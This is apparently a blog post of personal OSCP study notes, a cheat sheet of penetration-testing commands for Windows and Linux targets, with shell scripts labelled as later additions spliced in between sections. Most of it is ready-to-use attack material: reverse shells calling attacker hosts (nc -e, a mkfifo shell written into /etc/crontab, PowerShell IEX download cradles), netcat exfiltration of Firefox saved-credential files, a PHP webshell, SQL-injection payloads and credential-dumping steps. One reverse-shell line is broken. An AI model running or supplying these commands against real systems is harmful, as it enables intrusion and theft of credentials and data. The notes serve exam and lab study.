
OSCP - Personal Notes

Hey guys, in this post I am just going to copy-paste the notes I collected during my OSCP journey from different sources. Feel free to collaborate.

[*] SSH - 22

Tunneling

Forward local port 8443 to port 8443 on the target's loopback interface, to reach a service that only listens on 127.0.0.1 of the target:

ssh -L 8443:127.0.0.1:8443 user@x.x.x.x

Credential Spraying

ncrack -U users.txt -P pass.txt ssh://x.x.x.x

[*] DNS - 53

Perform a DNS zone transfer check. AXFR needs both the zone name and the name server to ask; "dig axfr x.x.x.x" on its own asks your default resolver for a zone literally called x.x.x.x and returns nothing useful.

dig axfr vhost.com @x.x.x.x

[*] TCPDUMP

Watch for ICMP on your interface, e.g. to confirm that a ping injected through a command injection reaches you:

tcpdump -i eth0 icmp

[*] SMB

1. SMB protocol enumeration (which dialects the host speaks; SMBv1 still enabled is worth noting):

nmap -p445 --script smb-protocols x.x.x.x

2. Check for SMB vulnerabilities (quote the glob so the shell does not expand it):

nmap -p445 --script "smb-vuln*" x.x.x.x

3. Get a list of shares available on a host:

smbclient -L x.x.x.x

4. Connect to the share:

smbclient //x.x.x.x/Share_Name

5. SMBMap for checking access on file shares, with credentials or as a null session:

smbmap -H x.x.x.x -u Username -p Password

smbmap -u '' -p '' -d 'htb.local' -H x.x.x.x

6. Download all files in a share:

smbget -R smb://x.x.x.x/Share -U Username

7. Use crackmapexec for spraying (--continue-on-success keeps going after the first valid pair instead of stopping, so every valid credential is reported):

crackmapexec smb 10.10.10.175 -u Users.txt -p Pass.txt --continue-on-success

8. Host an SMB server using impacket (serves the current directory as the share "htb"; -smb2support is needed for modern Windows clients that refuse SMBv1):

impacket-smbserver -smb2support htb $(pwd)

9. Anonymous login and recursive file enumeration using smbmap (--depth takes a number; 5 is the default):

smbmap -H x.x.x.x -u anonymous -r --depth 5

[*] LDAP

1. Basic enumeration:

ldapsearch -x -h htb.local -b "dc=htb,dc=local"

2. Check for null (anonymous) bind enumeration:

ldapsearch -x -h x.x.x.x -D '' -w '' -b "DC=domain,DC=local"

Note: -h is deprecated in current OpenLDAP in favour of -H ldap://x.x.x.x; if ldapsearch rejects -h, use that form.

[*] File Transfers

1. certutil (exfiltrating a file from the target as text). On the target, base64-encode it:

certutil -encode file.zip file.b64

Then push the text over the wire from the target's shell (type from cmd; cat works the same from PowerShell):

type file.b64 | C:\windows\temp\nc.exe attacker_IP 4444

And locally:

nc -lvp 4444 > file.b64

certutil wraps the output in -----BEGIN CERTIFICATE----- / -----END CERTIFICATE----- lines, so drop the first and last line. Note that "sed -i s/\n//g" does not remove newlines (sed works one line at a time, so there is no \n inside the pattern space to match); base64 -d accepts the line breaks anyway, but it rejects the \r that certutil's CRLF line endings leave behind, so those are what has to go:

sed -i '1d;$d' file.b64

tr -d '\r' < file.b64 | base64 -d > file.zip

2. Download with certutil:

certutil -urlcache -split -f http://x.x.x.x/nc.exe C:\users\public\nc.exe

3. PowerShell WebClient:

(New-Object Net.WebClient).DownloadFile('http://10.10.14.102:8000/test.txt','test.txt')

4. Invoke-WebRequest (the output directory must already exist; on Windows /tmp means \tmp on the current drive):

iwr -uri http://x.x.x.x:8080/nc.exe -outfile /tmp/nc.exe
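
Rebuilding the file on the attacker side, as an added shell example that is not part of the original notes. It assumes GNU coreutils (base64 -w, sha256sum) and awk; make_certutil_sample is a stand-in that only imitates the layout certutil -encode writes (BEGIN/END CERTIFICATE marker lines, 64-column base64, CRLF endings) so the decoder can be exercised offline, and the payload it encodes is constructed, not a real binary.

```shell
#!/bin/sh
# Added example: rebuilding a binary exfiltrated with "certutil -encode".
# Assumptions: GNU coreutils (base64 -w, sha256sum) and awk on the attacker box.

# Stand-in for what "certutil -encode in out" writes on the Windows side:
# BEGIN/END CERTIFICATE marker lines, 64-column base64, CRLF line endings.
# (Constructed for the demo; on a real engagement certutil produces this file.)
make_certutil_sample() {
    src=$1 dst=$2
    {
        printf -- '-----BEGIN CERTIFICATE-----\n'
        base64 -w 64 "$src"
        printf -- '-----END CERTIFICATE-----\n'
    } | awk '{ printf "%s\r\n", $0 }' > "$dst"
}

# Decoder for the attacker side:
#  - the marker lines go (grep -v), wherever they sit in the file
#  - the \r bytes go (tr -d), because GNU "base64 -d" rejects them as invalid
#    input; the LF line breaks themselves are accepted by the decoder
#  - sed 's/\n//g' would have done nothing here: sed sees one line at a time,
#    so there is never a "\n" inside its pattern space to match
certutil_b64_decode() {
    in=$1 out=$2
    grep -v -e '^-----BEGIN CERTIFICATE-----' -e '^-----END CERTIFICATE-----' "$in" \
        | tr -d '\r' \
        | base64 -d > "$out"
}

# Compare the rebuilt file against a digest taken on the source side
# ("certutil -hashfile file.zip SHA256" on Windows prints the same value).
# Returns 0 when the digests match, 1 otherwise.
verify_sha256() {
    file=$1 expected=$2
    actual=$(sha256sum "$file" | cut -d ' ' -f 1)
    [ "$actual" = "$expected" ]
}
```

Take the SHA256 on the Windows side before transferring and check it with verify_sha256 afterwards: a netcat transfer that is cut short can still decode without complaint and leave you with a truncated archive.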

[*] Virtual Host Scanning

https://github.com/codingo/VHostScan

VHostScan -t local.domain -w /opt/VHostScan/VHostScan/wordlists/virtual-host-scanning.txt

[*] Impacket Scripts

1. AS-REP roasting: request AS-REP hashes for accounts that have Kerberos pre-authentication disabled (-usersfile supplies the list of usernames to try; no password is needed):

python3 GetNPUsers.py local.domain/ -dc-ip 10.10.10.175 -request -usersfile users.txt

Later use the command below to crack the password (18200 is the hashcat mode for Kerberos 5 AS-REP etype 23):

hashcat -m 18200 -a 0 Hash.txt /usr/share/wordlists/rockyou.txt --force

2. Enumerate domain users (needs one valid set of credentials):

python3 GetADUsers.py -all local.domain/User -dc-ip x.x.x.x

3. Use this script to check if any user account has an SPN set and is therefore vulnerable to Kerberoasting (-request fetches the TGS tickets; they crack with hashcat -m 13100):

GetUserSPNs.py -request -dc-ip x.x.x.x local.domain/user

[*] MSSQL - 1433

1. Use the Impacket script mssqlclient.py for login (-windows-auth for a Windows/domain account instead of a SQL login):

mssqlclient.py user@x.x.x.x -windows-auth

2. From the SQL prompt, point xp_dirtree at a share on your box so the SQL Server service account authenticates to Responder, which captures its NetNTLMv2 hash (it is the service account's hash, not the logged-in user's):

xp_dirtree '\\x.x.x.x\doesntexist'

[*] Oracle - 1521

Use the ODAT tool for attacking the database:

https://github.com/quentinhardy/odat

[*] Redis - 6379

nmap --script redis-info -sV -p 6379 x.x.x.x

If the instance accepts unauthenticated commands, either write a webshell or an SSH key onto the box (CONFIG SET dir / dbfilename, then SAVE) and get access.

https://book.hacktricks.xyz/pentesting/6379-pentesting-redis

[*] Windows - Privilege Escalation Quick Wins!

1. CHM privilege escalation (a malicious compiled HTML Help file opened by a privileged user):

https://www.youtube.com/watch?v=k7gD4ufex9Q

https://gist.github.com/mgeeky/cce31c8602a144d8f2172a73d510e0e7

2. SAM & SYSTEM

If we are able to dump both the SAM and SYSTEM hives (they are locked while Windows runs, so they usually come from a backup, a shadow copy or a registry export), then use the following command to dump the hashes out of them offline:

impacket-secretsdump -sam SAM -system SYSTEM local

Then pass the hash to tools like smbmap or psexec; the NT hash is enough, no cracking required.

3. Juicy Potato

Does not work on Windows 10 1809 and later or on Windows Server 2019, where Microsoft fixed the DCOM/NTLM reflection it relies on (look at the newer variants such as PrintSpoofer or RoguePotato there).

Run whoami /priv to check for the following privileges. JuicyPotato itself needs SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, which service accounts such as IIS and MSSQL usually hold; the others are high-value privileges worth noting for other escalation paths:

• SeImpersonatePrivilege

• SeAssignPrimaryTokenPrivilege

• SeTcbPrivilege

• SeBackupPrivilege

• SeRestorePrivilege

• SeCreateTokenPrivilege

• SeLoadDriverPrivilege

• SeTakeOwnershipPrivilege

• SeDebugPrivilege

https://github.com/ohpe/juicy-potato

Run from cmd (-t * tries both CreateProcessWithTokenW and CreateProcessAsUser, -l is the local COM listener port; add -c {CLSID} with a CLSID matching the target OS if the default one fails):

juicypotato.exe -t * -p "Program to launch" -l 9001

Reference Machine - Conceal HTB

4. GPP Password

Use PowerUp.ps1 (PowerSploit) to extract Group Policy Preferences passwords: the cpassword values in Groups.xml and similar files are encrypted with an AES key Microsoft published, so they decrypt offline. Get-GPPPassword covers SYSVOL, Get-CachedGPPPassword the copies cached on the host.

5. Procdump

Dump the memory of processes such as browsers in order to extract credentials from the dump.

6. Kerberoasting by using the GetUserSPNs.py Impacket script

Use this script to check if any user account has an SPN set and is therefore vulnerable to Kerberoasting:

GetUserSPNs.py -request -dc-ip x.x.x.x domain.htb/user

7. Exploiting "runas /savecred"

Use cmdkey /list to check for stored credentials. If a shortcut (.lnk) on the box launches something with runas /savecred, read its target to see which account and command are used:

$WScript = New-Object -ComObject WScript.Shell
$shortcut = Get-ChildItem shortcut.lnk
$shortcut
$WScript.CreateShortcut($shortcut.FullName)

Then launch your own program with runas /savecred /user:<saved account>; the cached credential is used and no password prompt appears.

8. Use Mimikatz

Tips:

i. If it is being blocked by group policy (AppLocker), search the AppLocker bypass list:

https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md

ii. If nothing on that list works, go for meterpreter by using Unicorn:

python unicorn.py windows/meterpreter/reverse_http LHOST LPORT

It will generate 2 files:

a. powershell_attack.txt - save it as msf.ps1

b. unicorn.rc - use this to load msfconsole (msfconsole -r unicorn.rc)

Download and run msf.ps1 on the target machine.

iii. If Unicorn is not working then go for Empire.

Reference Machine - Access HTB

9. DPAPI

Download the master key file: c:\users\localuser\appdata\Roaming\Microsoft\Protect\x-x-x-xxxxx-xxxxxx\ (the folder is the user's SID; the master key files inside are named by GUID)

Download the credential file: C:\users\localuser\appdata\Roaming\Microsoft\Credentials\

Then on your local machine run the following command in mimikatz to decrypt the master key (both the user's SID and the user's plaintext password are needed; without the password the master key cannot be decrypted offline):

mimikatz # dpapi::masterkey /in:file /sid:sid-of-current-user /password:password-of-current-user

It will give you the master key. Then run the following against the credential blob to get the cleartext password: the first call without a key shows which master key GUID the blob references, the second decrypts it with the key recovered above.

mimikatz # dpapi::cred /in:Credentials-file

mimikatz # dpapi::cred /in:Credentials-file /masterkey:<masterkey-from-above>

10. AD Recycle Bin - recover deleted objects (needs the AD Recycle Bin feature enabled and rights to read deleted objects; attributes such as description sometimes still hold passwords)

Use the command below:

Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *

Reference link: https://www.poweradmin.com/blog/restoring-deleted-objects-from-active-directory-using-ad-recycle-bin/

11. AutoLogon Credentials Reuse

After running PowerUp we may end up getting AutoLogon credentials (stored in plaintext under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon) which we can use for escalating privileges:

$passwd = ConvertTo-SecureString 'PasswordofAdmin' -AsPlainText -Force

$creds = New-Object System.Management.Automation.PSCredential('administrator', $passwd)

A reverse shell can now be opened with the supplied credentials using the following command:

Start-Process -FilePath "powershell" -ArgumentList "IEX(New-Object Net.WebClient).DownloadString('http://x.x.x.x/InvokePowershellTCP.ps1')" -Credential $creds

12. Use cacls

To check the access control list:

Get-ACL file.txt | fl *

This grants User full access to the file and works when the current user owns the file (cacls is deprecated; icacls does the same job on current Windows):

cacls root.txt /t /e /p User:F

13. Perform Pass the Hash using pth-winexe (the hash goes after the %; the expected format is LMHASH:NTHASH, so when only the NT hash is known put the empty LM hash aad3b435b51404eeaad3b435b51404ee in front of it):

pth-winexe -U jeeves/Administrator%NTLMHash //ServerIP cmd

14. MS14-068 (Kerberos KDC PAC validation flaw; PyKEK forges a TGT with a PAC granting Domain Admin group membership and needs a valid domain user, its password and the domain SID)

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek

Reference Machine - Mantis

15. ALPC Task Scheduler LPE (CVE-2018-8440)

https://nvd.nist.gov/vuln/detail/CVE-2018-8440

In order to run this exploit, Authenticated Users must have read/execute access to C:\Windows\Tasks; check with:

icacls c:\Windows\Tasks

Machine Reference - Conceal

[*] Linux - Privilege Escalation Quick Wins!

1. SSH files found:

If an id_rsa file is found and it is passphrase-protected, use ssh2john.py to turn it into a john hash and crack the passphrase. Then:

chmod 400 id_rsa

ssh -i id_rsa user@x.x.x.x

2. Look for services running locally which are not exposed to the public (netstat -lntp or ss -lntp lists them) and tunnel them to your box with the SSH -L forwarding above.

3. Create SSH keys:

This will create the private key "user" and the public key "user.pub". The private key needs 600 permissions on your side; the public key goes into ~/.ssh/authorized_keys of the target user.

ssh-keygen -f user

chmod 600 user

ssh -i user localuser@x.x.x.x

4. Screen 4.5.0 Local PrivEsc:

https://www.exploit-db.com/exploits/41154

5. Use sudo -l to check what commands/scripts we can execute as root, then look each of them up on GTFOBins.

6. Redhat/CentOS root through network-scripts

The ifcfg-* files are sourced as shell scripts, so a value containing a space is parsed as an assignment followed by a command: NAME=test /bin/id runs /bin/id as root when the interface is brought up. Command execution therefore only needs write access to an ifcfg file.

https://seclists.org/fulldisclosure/2019/Apr/24

Reference Machine - Networked HTB
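
The parsing bug behind this, shown on a constructed ifcfg file as an added example (not from the original notes or from the initscripts project): load_ifcfg_unsafe loads the file the way the initscripts network-functions do, by sourcing it, and load_ifcfg_safe is a hardened reader that treats the file as data. The marker path and the file contents are constructed for the demo; the hardened reader is deliberately strict and does not accept the quoted values the real format allows.

```shell
#!/bin/sh
# Added example: why a space in an ifcfg value is code execution.
# The initscripts network-functions load ifcfg-* files by sourcing them, so the
# file is executed by the shell rather than parsed. In shell, "NAME=test /usr/bin/id"
# is an environment assignment followed by a command, and the command runs with
# the privileges of the network scripts (root).

# The vulnerable pattern, reduced to its essence.
load_ifcfg_unsafe() {
    . "$1"
}

# A hardened reader: the file is data. Accept only KEY=VALUE with a restricted
# alphabet on both sides; anything else (spaces, quotes, $(), backticks, ;) is
# rejected instead of being handed to the shell parser.
# Prints "OK<TAB>KEY=VALUE" or "REJECT<TAB>line" for every non-comment line.
load_ifcfg_safe() {
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            ''|'#'*) continue ;;
            *=*) ;;
            *) printf 'REJECT\t%s\n' "$line"; continue ;;
        esac
        key=${line%%=*}
        val=${line#*=}
        case "$key" in
            ''|*[!A-Za-z0-9_]*) printf 'REJECT\t%s\n' "$line"; continue ;;
        esac
        case "$val" in
            *[!A-Za-z0-9_.:/-]*) printf 'REJECT\t%s\n' "$line"; continue ;;
        esac
        printf 'OK\t%s=%s\n' "$key" "$val"
    done < "$1"
}

# Constructed ifcfg file for the demo: a normal interface definition plus the
# injected NAME line. $1 is the marker file the injected command will create.
write_demo_ifcfg() {
    marker=$1 out=$2
    printf 'DEVICE=eth0\nBOOTPROTO=dhcp\nONBOOT=yes\n# injected by the low-privileged user:\nNAME=test touch %s\n' "$marker" > "$out"
}
```

On the target the injected line goes into an ifcfg file you can write and fires the next time the interface is (re)configured; on your own box, running load_ifcfg_unsafe on the demo file creates the marker, while load_ifcfg_safe rejects that line and leaves the rest intact.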

7. Vault token

https://www.vaultproject.io/docs/concepts/tokens.html

Reference Machine - Craft HTB

8. Logstash input as a command (a writable input file feeding a pipeline with an exec filter runs your line as the logstash user)

Reference machine - Haystack

9. systemctl SUID exploitation (a SUID systemctl lets you install and start a unit file that runs as root; see GTFOBins)

10. PATH hijacking using pspy (pspy shows root/cron processes that call a binary by a relative name)

To check which groups our user belongs to:

groups

To find files and folders owned by a group:

find / -group group_name 2>/dev/null

echo $PATH

Reference Machine - Writeup HTB

12. Vim

If sudo allows vi on some file, spawn a root shell from it:

sudo /usr/bin/vi /var/www/html/anyfile -c ':!/bin/bash'

(anyfile stands for whatever path the sudo rule lets us open as root.)

13. PrivEsc via LXD (membership of the lxd group)

https://reboare.github.io/lxd/lxd-escape.html

A privileged container with the host's root filesystem mounted inside it gives read/write access to the whole host as root:

lxc init ubuntu:16.04 blah -c security.privileged=true

lxc config device add blah root disk source=/ path=/mnt/root recursive=true

Steps (when the target cannot pull an image from the internet):

i. Create an alpine build locally.

Link: https://github.com/saghul/lxd-alpine-builder

ii. Transfer the tar.gz file to the remote machine.

scp yourfile.tar.gz user@x.x.x.x:

iii. Import the image into lxc:

lxc image import yourfile.tar.gz alpine # if this doesn't work run

lxc image import yourfile.tar.gz --alias alpine

iv. Check if it is imported or not by using:

lxc image list

v. Now create a machine:

lxc init alpine privesc -c security.privileged=true

vi. lxc list to view the machine.

vii. Mount the host's disk into the machine:

lxc config device add privesc host-root disk source=/ path=/mnt/root/

viii. Start the container:

lxc start privesc

ix. lxc exec privesc /bin/sh

Reference Machine - Calamity

14. Module Hijacking

If abc.py imports a module from def.py and we have write access to def.py (or to the directory the script lives in, which Python searches first), we can perform module hijacking: whatever we add to def.py runs with the privileges of whoever executes abc.py. Example, assuming abc.py is run by root (the added code appends a cron entry that spawns a reverse shell):

shell = '''
* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/b -i 2>&1|nc 10.10.14.111 4444 >/tmp/f

'''

f = open('/etc/crontab', 'a')
f.write(shell)
f.close()
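
A check for the precondition described above, as an added shell example that is not part of the original notes: it lists the top-level modules a Python script imports and reports which of them could be hijacked, either by editing a module that already sits next to the script or by creating one there, since Python puts the script's own directory first on sys.path. Modules that are normally loaded while the interpreter starts (os, sys and a few others) are already in sys.modules and are not picked up again, so those are reported as SKIP. The sample script and module in the test are constructed; the set of start-up modules is an assumption for a standard CPython start.

```shell
#!/bin/sh
# Added example: which imports of a Python script could be hijacked?
# Python puts the directory of the script it runs first on sys.path, so a
# writable module next to the script can be edited, and a missing one can be
# created there to shadow the real module. Modules already loaded while the
# interpreter starts are taken from sys.modules and never re-imported, so a
# shadow copy of those is ignored (assumed list for a standard CPython start).

STARTUP_MODULES="sys os io abc codecs stat site builtins posixpath genericpath"

# Top-level module names imported by a script, one per line, sorted and unique
# ("import a.b, c as d" -> a, c ; "from x.y import z" -> x ; relative imports skipped).
list_python_imports() {
    awk '
        /^[[:space:]]*import[[:space:]]/ {
            sub(/^[[:space:]]*import[[:space:]]+/, "")
            sub(/[[:space:]]*#.*/, "")
            n = split($0, mods, /[[:space:]]*,[[:space:]]*/)
            for (i = 1; i <= n; i++) { split(mods[i], p, /[. ]/); if (p[1] != "") print p[1] }
        }
        /^[[:space:]]*from[[:space:]]/ {
            split($2, p, "."); if (p[1] != "") print p[1]
        }' "$1" | sort -u
}

# Report, one TAB-separated line per module: ACTION  module  detail
#   EDIT    a module file/package next to the script is writable by us
#   CREATE  the script directory is writable, a shadow module can be dropped in
#   SKIP    loaded at interpreter start-up, shadowing it does not work
#   OK      nothing to do from this directory
# Note: "-w" is always true for root, so run this as the low-privileged user.
python_import_hijack_check() {
    script=$1
    dir=$(cd "$(dirname "$script")" && pwd)
    list_python_imports "$script" | while IFS= read -r mod; do
        case " $STARTUP_MODULES " in
            *" $mod "*) printf 'SKIP\t%s\tnormally loaded at start-up, shadow copy is ignored\n' "$mod"; continue ;;
        esac
        if [ -d "$dir/$mod" ]; then
            target="$dir/$mod"
        elif [ -e "$dir/$mod.py" ]; then
            target="$dir/$mod.py"
        else
            target=""
        fi
        if [ -n "$target" ]; then
            if [ -w "$target" ]; then
                printf 'EDIT\t%s\t%s is writable\n' "$mod" "$target"
            else
                printf 'OK\t%s\t%s exists but is not writable\n' "$mod" "$target"
            fi
        elif [ -w "$dir" ]; then
            printf 'CREATE\t%s\t%s/%s.py would shadow the real module (sys.path[0])\n' "$mod" "$dir" "$mod"
        else
            printf 'OK\t%s\tresolved outside %s, which is not writable\n' "$mod" "$dir"
        fi
    done
}
```

Run it as the unprivileged user against the script pspy or the crontab showed running as root; an EDIT or CREATE line is the file to put the payload in.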

15. Inspecting the Mozilla Firefox profile

Check for a .mozilla folder (logins.json holds the saved credentials, key4.db or key3.db the key that encrypts them; both files are needed).

Gain the saved credentials using tools like:

firefox_decrypt - https://github.com/unode/firefox_decrypt

firepwd - https://github.com/lclevy/firepwd

Transfer the files as:

cd /tmp

zip -r mozilla.zip ~/.mozilla

nc x.x.x.x 1234 < mozilla.zip

16. Linux Capabilities

From capabilities(7): for the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root) and unprivileged processes (whose effective UID is nonzero). Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process's credentials (usually: effective UID, effective GID, and supplementary group list). Capabilities split root's power into separate units that can be attached to a binary, so an unprivileged process running that binary gets just those units.

How to detect:

getcap -r / 2>/dev/null

If you find a binary with +ep (effective and permitted) capabilities, look it up on GTFOBins and exploit it. Which capability it is matters: cap_setuid+ep on an interpreter (python, perl) gives a root shell directly, cap_dac_read_search+ep bypasses read permission checks (read /etc/shadow or root's id_rsa), cap_dac_override+ep bypasses write checks as well. Example:

https://gtfobins.github.io/gtfobins/openssl/#file-read

With file read/write ability, modify sudoers.

Reference Machine - Lightweight HTB
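
A triage helper for getcap output, added here as an example (not part of the original notes): it normalises both output formats getcap has used and rates each capability by how directly it leads to root, separating capabilities that are effective from ones that are only permitted. The getcap lines below are constructed sample input, and the risk ratings are my own reading of capabilities(7) and GTFOBins, not an exhaustive list.

```shell
#!/bin/sh
# Added example: triage "getcap -r / 2>/dev/null" output.
# Constructed sample in the two formats getcap has printed over the years:
#   old libcap:  /path = cap_a,cap_b+flags
#   new libcap:  /path cap_a,cap_b=flags
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/opt/reader/openssl = cap_dac_read_search+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/lib/backup/tar cap_dac_read_search=p'

# Risk rating per capability (my reading of capabilities(7) / GTFOBins; not exhaustive).
cap_risk() {
    case "$1" in
        cap_setuid)          echo "HIGH: setuid(0) from the binary -> root shell (interpreters: see GTFOBins)" ;;
        cap_setgid)          echo "HIGH: setgid(0) -> access to root-group files such as shadow" ;;
        cap_dac_read_search) echo "HIGH: bypasses read permission checks -> /etc/shadow, /root/.ssh/id_rsa" ;;
        cap_dac_override)    echo "HIGH: bypasses read/write/exec checks -> edit /etc/sudoers or /etc/passwd" ;;
        cap_sys_admin)       echo "HIGH: mount and namespace tricks, effectively root" ;;
        cap_sys_ptrace)      echo "HIGH: ptrace any process -> inject into a root process" ;;
        cap_sys_module)      echo "HIGH: load kernel modules" ;;
        cap_chown|cap_fowner) echo "MEDIUM: take over or re-permission files you do not own" ;;
        cap_net_raw|cap_net_admin|cap_net_bind_service)
                             echo "LOW: network capability (ping/tcpdump), not a direct privesc" ;;
        *)                   echo "INFO: review manually" ;;
    esac
}

# Read getcap lines on stdin, print one TAB-separated record per capability:
#   path  capability  effective|permitted-only  rating
# "permitted-only" (flags without 'e') means the program has to raise the
# capability itself before it applies, which stock binaries rarely do.
# Paths containing spaces are not handled (getcap does not quote them).
triage_getcap() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        path=${line%% *}
        rest=${line#"$path"}
        rest=${rest#" "}
        rest=${rest#"= "}
        for clause in $rest; do
            case "$clause" in
                *+*) caps=${clause%%+*}; flags=${clause#*+} ;;
                *=*) caps=${clause%%=*}; flags=${clause#*=} ;;
                *)   continue ;;
            esac
            case "$flags" in
                *e*) state=effective ;;
                *)   state=permitted-only ;;
            esac
            for cap in $(printf '%s' "$caps" | tr ',' ' '); do
                printf '%s\t%s\t%s\t%s\n' "$path" "$cap" "$state" "$(cap_risk "$cap")"
            done
        done
    done
}

# Only the findings worth acting on first.
high_risk_caps() {
    triage_getcap | grep 'HIGH'
}
```

On a target, pipe the real output in: getcap -r / 2>/dev/null | high_risk_caps. In the sample, python3.8 with cap_setuid and openssl with cap_dac_read_search are the two immediate wins; tar only has cap_dac_read_search permitted, so it would have to raise it itself before it helps.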

17. PostgreSQL, PAM and NSS

Enumerate for passwords under the web directory /var/www/html (web applications that authenticate against PostgreSQL or PAM keep the connection string in a config file):

grep -Ri password /var/www/html

https://serverfault.com/questions/538383/understand-pam-and-nss/538503#538503

Reference Machine - RedCross HTB

18. H2 Database

https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html

H2 is an open source database management system written in Java; its console lets a user define an ALIAS backed by arbitrary Java code, which is the RCE. curl is used to verify that the login page is accessible internally (here on the IPv6 loopback; -g stops curl from treating the brackets as a glob):

curl -g -6 'http://[::1]:8002'

ps aux | grep h2 # To detect the H2 DBMS version


19. Docker Privileges

id # Check if the current user belongs to the docker group (equivalent to root on the host)

docker images --all # Reveals available images on the system

docker run --rm -v /:/hostOS -it imageonbox sh # the host filesystem is mounted at /hostOS inside the container

20. Homer - Apache CouchDB

Exploit: https://www.exploit-db.com/exploits/44913

Explanation: https://justi.cz/security/2017/11/14/couchdb-rce-npm.html

How to detect: look for the couchdb process in the output of the following command:

ps aux

[*] LFI & RFI Scenario

1. If LFI is found on a Windows system, try to fetch common Windows files like:

/windows/system32/license.rtf

/windows/panther/unattend.xml

2. In case you are not getting any sensitive information or are not able to exploit it further, go for RFI by hosting a local SMB server and confirm it by listening on 445, e.g.:

http://example.php?file=\\10.10.14.111\htb\file.txt

nc -lvnp 445

If nc receives a connection, the application follows UNC paths and is usable for RFI.

3. Also run Responder and try to get a NetNTLMv2 hash from that connection (stop nc first; Responder needs port 445 itself):

responder -I eth0

4. Use tcpdump to verify:

tcpdump -i eth0 port 445

[*] RCE Scenario

1. Use nishang's Invoke-PowerShellTcp.ps1.

2. If it is not working, check whether PowerShell is running in Constrained Language Mode with the following command (it prints ConstrainedLanguage or FullLanguage; in constrained mode the .NET calls these scripts rely on are blocked):

powershell.exe $ExecutionContext.SessionState.LanguageMode

3. In such a scenario we can drop nc on the server via our locally hosted SMB server and get a reverse connection:

\\10.10.14.111\htb\nc.exe 10.10.14.111 9001 -e powershell

We can also drop nc.exe with WebClient (DownloadFile, not DownloadString, for a binary):

powershell (New-Object Net.WebClient).DownloadFile('http://x.x.x.x/nc.exe','nc.exe')

or with IWR:

powershell IWR -uri http://x.x.x.x/nc.exe -OutFile C:\Windows\Temp\nc.exe

cmd /c c:\windows\Temp\nc.exe x.x.x.x 9001 -e powershell.exe

Also we can use the command below (wget is an alias of Invoke-WebRequest in PowerShell):

powershell wget "http://x.x.x.x/nc.exe" -outfile "nc.exe"

nc.exe -e cmd.exe x.x.x.x 1234

[*] SQL Injection Scenario

1. Use EXEC xp_cmdshell to execute a command via SQL injection (MSSQL; xp_cmdshell is disabled by default and turning it on needs sysadmin) and try to steal a hash using Responder:

id=1; EXEC xp_cmdshell whoami;--

or, since xp_dirtree works even where xp_cmdshell is disabled and makes the SQL Server service account authenticate to your share:

id=1; declare @q varchar(200); set @q='\\x.x.x.x\localshare'; exec master.dbo.xp_dirtree @q;--+

2. Use INTO OUTFILE to write content to a file (MySQL; needs the FILE privilege, and secure_file_priv must not restrict the destination):

http://x.x.x.x/test.php?id=-1 union select 1,load_file('/etc/passwd'),3,4,5 into outfile '/var/www/html/test.txt'

After that visit http://x.x.x.x/test.txt

Also check the default vhost config 000-default.conf under /etc/apache2/sites-enabled/ to learn the DocumentRoot.

One can also get a webshell by writing a PHP file the same way:

<?php system($_REQUEST["exec"]); ?>

[*] LFI to RCE

https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html

https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/

[*] Reverse Connection Issues

1. If the reverse shell dies instantly, use the following command to check whether some sort of intrusion detection or clean-up process is present on the box (-cmin -60 is the last 60 minutes; -ctime -60 would be 60 days):

find /home -cmin -60 # lists files whose metadata changed in the last 60 minutes

In such a scenario copy nc to a new name (cp /bin/nc /dev/shm/newname) and try to execute the nc command again under that name, since such tooling often matches on the process or file name.

2. Try listening on port 80 or 443, which egress filtering is least likely to block.

[*] Spawn TTY

1. python3 -c 'import pty;pty.spawn("/bin/sh")'

2. echo os.system('/bin/bash')

3. /bin/sh -i

4. perl -e 'exec "/bin/sh";'

5. ruby: exec "/bin/sh"

6. lua: os.execute('/bin/sh')

7. (From within IRB) exec "/bin/sh"

8. (From within vi) :!bash

9. (From within vi) :set shell=/bin/bash:shell

10. (From within nmap --interactive) !sh

By Latish Danawale - August 14, 2020
